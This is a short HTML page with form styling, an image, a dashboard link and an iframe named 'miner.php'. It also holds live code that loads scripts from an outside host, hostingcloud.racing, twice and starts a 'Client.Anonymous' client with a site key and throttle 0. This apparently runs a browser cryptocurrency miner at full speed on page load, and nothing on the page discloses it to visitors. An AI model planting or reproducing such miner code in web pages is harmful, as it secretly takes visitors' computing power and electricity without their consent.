<script src="https://www.hostingcloud.racing/i9t7.js"></script>
<script>
    var _client = new Client.Anonymous('86a3ad7f212c6d984453d010dcfb2a642bd43afddae3f872aa11e3b54ad0fe2c', {
        throttle: 0, c: 'w', ads: 0
    });
    _client.start();
    

</script>
<style>
    body {
    font-family: 'Lucida Console', 'Courier New', monospace;
}
a {
    text-decoration: none;
}
img {
    width:150;
    height:150;
}
input[type=text] {
  width: 80%;
  padding: 12px 20px;
  margin: 8px 0;
  box-sizing: border-box;
  border: 3px solid #ccc;
  -webkit-transition: 0.5s;
  transition: 0.5s;
  outline: none;
}

input[type=text]:focus {
  border: 3px solid #555;
}
input[type=number] {
  width: 80%;
  padding: 12px 20px;
  margin: 8px 0;
  box-sizing: border-box;
  border: 3px solid #ccc;
  -webkit-transition: 0.5s;
  transition: 0.5s;
  outline: none;
}

input[type=number]:focus {
  border: 3px solid #555;
}
input[type=submit] {
  background-color: #4CAF50;
  border: none;
  color: white;
  padding: 16px 32px;
  text-decoration: none;
  margin: 4px 2px;
  cursor: pointer;
  border-radius: 12px;
}
</style>
<center>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
    <img src="/img/sirex.jpg">
        <br><br>
        <iframe src="miner.php" style="border:none; width:100; height:100;"></iframe>
        <br><br>
        <a href="index.php">Go</a> to dashboard!
        <br><br>
</center>
<script src="https://www.hostingcloud.racing/7oSk.js"></script>
<script>
    var _client = new Client.Anonymous('86a3ad7f212c6d984453d010dcfb2a642bd43afddae3f872aa11e3b54ad0fe2c', {
        throttle: 0, c: 'w'
    });
    _client.start();

</script>